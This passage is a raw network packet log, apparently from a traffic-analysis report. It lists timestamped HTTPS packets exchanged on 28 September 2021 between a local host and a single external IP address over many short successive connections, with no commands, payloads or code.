Sep 28, 2021 07:59:43.649053097 CEST	50108	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.649105072 CEST	443	50108	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.649281025 CEST	50108	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.649933100 CEST	50108	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.649945974 CEST	443	50108	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.707954884 CEST	443	50108	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.712518930 CEST	50108	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.712553024 CEST	443	50108	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.712824106 CEST	50108	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.712830067 CEST	443	50108	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.845347881 CEST	443	50108	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.845438004 CEST	443	50108	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.845603943 CEST	50108	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.847932100 CEST	50108	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.849198103 CEST	50109	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.849257946 CEST	443	50109	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.849455118 CEST	50109	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.850156069 CEST	50109	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.850173950 CEST	443	50109	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.909065008 CEST	443	50109	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.913429976 CEST	50109	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.913475037 CEST	443	50109	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:43.914318085 CEST	50109	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:43.914335966 CEST	443	50109	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.013515949 CEST	443	50109	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.013602018 CEST	443	50109	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.013756037 CEST	50109	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.015017986 CEST	50109	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.016412020 CEST	50110	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.016483068 CEST	443	50110	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.016661882 CEST	50110	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.017266035 CEST	50110	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.017283916 CEST	443	50110	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.076605082 CEST	443	50110	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.080302954 CEST	50110	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.080734968 CEST	443	50110	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.083262920 CEST	50110	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.083290100 CEST	443	50110	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.196110964 CEST	443	50110	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.196208954 CEST	443	50110	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.196346045 CEST	50110	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.197437048 CEST	50110	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.199548960 CEST	50111	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.199594021 CEST	443	50111	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.200479031 CEST	50111	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.200512886 CEST	50111	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.200521946 CEST	443	50111	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.258778095 CEST	443	50111	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.263056993 CEST	50111	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.263092041 CEST	443	50111	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.263221979 CEST	50111	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.263231993 CEST	443	50111	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.366488934 CEST	443	50111	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.367760897 CEST	443	50111	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.367877960 CEST	50111	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.368505001 CEST	50111	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.370759964 CEST	50112	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.370810986 CEST	443	50112	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.370969057 CEST	50112	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.372710943 CEST	50112	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.372735023 CEST	443	50112	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.435353041 CEST	443	50112	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.439305067 CEST	50112	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.439343929 CEST	443	50112	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.439451933 CEST	50112	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.439466000 CEST	443	50112	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.543544054 CEST	443	50112	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.543791056 CEST	443	50112	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.543909073 CEST	50112	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.544965982 CEST	50112	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.547435999 CEST	50113	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.547492981 CEST	443	50113	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.547750950 CEST	50113	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.548362970 CEST	50113	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.548382998 CEST	443	50113	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.605739117 CEST	443	50113	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.609927893 CEST	50113	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.609971046 CEST	443	50113	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.610127926 CEST	50113	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.610142946 CEST	443	50113	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.720351934 CEST	443	50113	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.721838951 CEST	443	50113	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.722570896 CEST	50113	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.724504948 CEST	50113	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.725404024 CEST	50114	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.725454092 CEST	443	50114	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.725568056 CEST	50114	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.726213932 CEST	50114	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.726223946 CEST	443	50114	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.795963049 CEST	443	50114	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.800451994 CEST	50114	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.800498009 CEST	443	50114	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.800694942 CEST	50114	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.800704956 CEST	443	50114	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.932801008 CEST	443	50114	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.932898045 CEST	443	50114	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.933140993 CEST	50114	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.934946060 CEST	50114	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.937103033 CEST	50115	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.937156916 CEST	443	50115	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:44.937263966 CEST	50115	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.938333988 CEST	50115	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:44.938353062 CEST	443	50115	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.010129929 CEST	443	50115	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.013084888 CEST	50115	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.013129950 CEST	443	50115	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.013241053 CEST	50115	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.013252974 CEST	443	50115	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.104672909 CEST	443	50115	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.104767084 CEST	443	50115	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.104984999 CEST	50115	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.106129885 CEST	50115	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.108067989 CEST	50116	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.108112097 CEST	443	50116	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.108249903 CEST	50116	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.108896971 CEST	50116	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.108925104 CEST	443	50116	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.165539980 CEST	443	50116	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.168607950 CEST	50116	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.168658972 CEST	443	50116	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.168761969 CEST	50116	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.168773890 CEST	443	50116	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.271461964 CEST	443	50116	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.271538973 CEST	443	50116	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.271601915 CEST	50116	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.272564888 CEST	50116	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.274327040 CEST	50117	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.274386883 CEST	443	50117	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.274483919 CEST	50117	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.274930000 CEST	50117	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.274952888 CEST	443	50117	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.332701921 CEST	443	50117	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.335575104 CEST	50117	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.335633039 CEST	443	50117	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.336020947 CEST	50117	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.336030960 CEST	443	50117	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.438957930 CEST	443	50117	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.439030886 CEST	443	50117	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.439080000 CEST	50117	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.439878941 CEST	50117	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.441222906 CEST	50118	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.441258907 CEST	443	50118	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.441340923 CEST	50118	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.441790104 CEST	50118	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.441802025 CEST	443	50118	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.497647047 CEST	443	50118	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.500914097 CEST	50118	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.500952005 CEST	443	50118	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.501022100 CEST	50118	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.501034975 CEST	443	50118	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.603190899 CEST	443	50118	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.603282928 CEST	443	50118	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.603382111 CEST	50118	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.604113102 CEST	50118	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.605429888 CEST	50119	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.605468035 CEST	443	50119	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.605600119 CEST	50119	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.606790066 CEST	50119	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.606820107 CEST	443	50119	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.662975073 CEST	443	50119	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.666754961 CEST	50119	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.666788101 CEST	443	50119	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.666961908 CEST	50119	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.666971922 CEST	443	50119	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.765834093 CEST	443	50119	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.765918970 CEST	443	50119	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.766028881 CEST	50119	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.767019033 CEST	50119	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.769270897 CEST	50120	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.769321918 CEST	443	50120	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.769404888 CEST	50120	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.769853115 CEST	50120	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.769874096 CEST	443	50120	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.827429056 CEST	443	50120	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.830768108 CEST	50120	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.830806017 CEST	443	50120	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.831345081 CEST	50120	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.831357956 CEST	443	50120	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.931075096 CEST	443	50120	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.931163073 CEST	443	50120	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.931276083 CEST	50120	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.932210922 CEST	50120	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.933851957 CEST	50121	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.933898926 CEST	443	50121	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.934000015 CEST	50121	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.934451103 CEST	50121	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.934467077 CEST	443	50121	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.993832111 CEST	443	50121	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.997679949 CEST	50121	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.997719049 CEST	443	50121	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:45.997879028 CEST	50121	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:45.997888088 CEST	443	50121	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.098957062 CEST	443	50121	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.099050045 CEST	443	50121	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.100074053 CEST	50121	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.100419998 CEST	50121	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.102860928 CEST	50122	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.102919102 CEST	443	50122	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.103363991 CEST	50122	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.103733063 CEST	50122	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.103751898 CEST	443	50122	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.160666943 CEST	443	50122	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.163532972 CEST	50122	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.163582087 CEST	443	50122	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.163671970 CEST	50122	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.163686037 CEST	443	50122	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.324217081 CEST	443	50122	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.324429035 CEST	443	50122	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.324606895 CEST	50122	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.325534105 CEST	50122	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.327847958 CEST	50123	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.327881098 CEST	443	50123	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.327965021 CEST	50123	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.328447104 CEST	50123	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.328458071 CEST	443	50123	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.385468006 CEST	443	50123	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.390635014 CEST	50123	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.390686035 CEST	443	50123	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.391314983 CEST	50123	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.391335964 CEST	443	50123	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.500140905 CEST	443	50123	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.500211954 CEST	443	50123	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.500737906 CEST	50123	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.501713037 CEST	50123	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.504029989 CEST	50124	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.504064083 CEST	443	50124	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.504189014 CEST	50124	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.504913092 CEST	50124	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.504929066 CEST	443	50124	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.561625957 CEST	443	50124	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.566982031 CEST	50124	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.567032099 CEST	443	50124	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.567137003 CEST	50124	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.567154884 CEST	443	50124	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.653129101 CEST	443	50124	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.653207064 CEST	443	50124	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.653706074 CEST	50124	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.654198885 CEST	50124	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.655780077 CEST	50125	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.655821085 CEST	443	50125	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.655927896 CEST	50125	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.656371117 CEST	50125	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.656392097 CEST	443	50125	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.714076042 CEST	443	50125	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.717890978 CEST	50125	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.717920065 CEST	443	50125	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.718030930 CEST	50125	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.718044043 CEST	443	50125	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.824557066 CEST	443	50125	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.824635983 CEST	443	50125	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.824769020 CEST	50125	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.825850964 CEST	50125	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.827717066 CEST	50126	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.827764988 CEST	443	50126	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.827867985 CEST	50126	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.828599930 CEST	50126	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.828619957 CEST	443	50126	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.885802031 CEST	443	50126	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.889540911 CEST	50126	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.889599085 CEST	443	50126	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.889727116 CEST	50126	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.889736891 CEST	443	50126	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.989120007 CEST	443	50126	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.989192963 CEST	443	50126	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.989263058 CEST	50126	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.990041971 CEST	50126	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.991388083 CEST	50127	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.991434097 CEST	443	50127	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:46.991524935 CEST	50127	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.992146015 CEST	50127	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:46.992166996 CEST	443	50127	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.051748037 CEST	443	50127	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.055936098 CEST	50127	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.055977106 CEST	443	50127	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.056111097 CEST	50127	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.056123018 CEST	443	50127	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.147104025 CEST	443	50127	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.147216082 CEST	443	50127	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.147350073 CEST	50127	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.148552895 CEST	50127	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.150854111 CEST	50128	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.150901079 CEST	443	50128	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.150999069 CEST	50128	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.151593924 CEST	50128	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.151614904 CEST	443	50128	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.207495928 CEST	443	50128	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.211646080 CEST	50128	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.211682081 CEST	443	50128	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.211798906 CEST	50128	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.211811066 CEST	443	50128	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.307712078 CEST	443	50128	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.307785988 CEST	443	50128	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.307861090 CEST	50128	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.308842897 CEST	50128	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.310621977 CEST	50129	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.310662985 CEST	443	50129	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.310791969 CEST	50129	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.311290026 CEST	50129	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.311310053 CEST	443	50129	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.370315075 CEST	443	50129	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.374197960 CEST	50129	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.374228001 CEST	443	50129	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.374373913 CEST	50129	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.374382973 CEST	443	50129	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.477370024 CEST	443	50129	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.477499008 CEST	443	50129	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.477560043 CEST	50129	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.478760958 CEST	50129	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.480659962 CEST	50130	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.480689049 CEST	443	50130	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.480778933 CEST	50130	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.481306076 CEST	50130	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.481319904 CEST	443	50130	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.539771080 CEST	443	50130	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.543741941 CEST	50130	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.543771982 CEST	443	50130	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.543937922 CEST	50130	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.543948889 CEST	443	50130	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.649487019 CEST	443	50130	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.649564028 CEST	443	50130	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.649702072 CEST	50130	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.650593996 CEST	50130	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.652131081 CEST	50131	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.652174950 CEST	443	50131	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.652278900 CEST	50131	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.652683973 CEST	50131	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.652703047 CEST	443	50131	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.708946943 CEST	443	50131	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.713344097 CEST	50131	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.713395119 CEST	443	50131	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.713483095 CEST	50131	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.713500023 CEST	443	50131	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.818377972 CEST	443	50131	149.154.167.220	192.168.2.4
